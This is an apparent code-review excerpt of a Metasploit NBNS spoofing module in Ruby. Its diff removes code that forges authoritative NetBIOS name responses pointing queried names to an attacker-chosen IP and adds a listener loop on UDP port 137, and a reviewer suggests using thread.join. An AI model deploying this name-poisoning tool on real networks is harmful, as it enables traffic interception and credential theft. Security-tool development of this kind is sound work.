modules/auxiliary/spoof/nbns/nbns_response.rb

```diff
@@ -44,108 +47,144 @@ def initialize
-
-        if datastore['DEBUG']
-          print_status("transid:        #{nbnsq_transid.unpack('H4')}")
-          print_status("tlags:          #{nbnsq_flags.unpack('B16')}")
-          print_status("questions:      #{nbnsq_questions.unpack('n')}")
-          print_status("answerrr:       #{nbnsq_answerrr.unpack('n')}")
-          print_status("authorityrr:    #{nbnsq_authorityrr.unpack('n')}")
-          print_status("additionalrr:   #{nbnsq_additionalrr.unpack('n')}")
-          print_status("name:           #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
-          print_status("full name:      #{nbnsq_name.slice(1..-2)}")
-          print_status("decoded:        #{decoded}")
-          print_status("decoded name:   #{nbnsq_decodedname}")
-          print_status("type:           #{nbnsq_type.unpack('n')}")
-          print_status("class:          #{nbnsq_class.unpack('n')}")
-        end
-
-        # time to build a response packet - Oh YEAH!
-        response = nbnsq_transid +
-          "\x85\x00" + # Flags = response + authoratative + recursion desired +
-          "\x00\x00" + # Questions = 0
-          "\x00\x01" + # Answer RRs = 1
-          "\x00\x00" + # Authority RRs = 0
-          "\x00\x00" + # Additional RRs = 0
-          nbnsq_name + # original query name
-          nbnsq_type + # Type = NB ...whatever that means
-          nbnsq_class+ # Class = IN
-          "\x00\x04\x93\xe0" + # TTL = a long ass time
-          "\x00\x06" + # Datalength = 6
-          "\x00\x00" + # Flags B-node, unique = whet ever that means
-          datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
-
-        open_pcap
-
-        p = PacketFu::UDPPacket.new
-        p.ip_saddr = Rex::Socket.source_address(rhost)
-        p.ip_daddr = rhost
-        p.ip_ttl = 255
-        p.udp_sport = 137
-        p.udp_dport = src_port
-        p.payload = response
-        p.recalc
-
-        capture_sendto(p, rhost)
-
-        close_pcap
-
-      else
-        vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
+    end
+  end
+
+  def run
+    check_pcaprub_loaded()
+    ::Socket.do_not_reverse_lookup = true  # Mac OS X workaround
+
+    # Avoid receiving extraneous traffic on our send socket
+    open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
+
+    self.sock = Rex::Socket.create_udp(
+      'LocalHost' => "0.0.0.0",
+      'LocalPort' => 137,
+      'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+    add_socket(self.sock)
+    self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
+
+    self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
+      begin
+        monitor_socket
+      rescue ::Interrupt
+        raise $!
+      rescue ::Exception
+        print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
       end
+    }
+
+    print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
+
+    while thread.alive?
```

Comment:
It could be replaced by thread.join, this is another case where nbns was repatterned after llmr.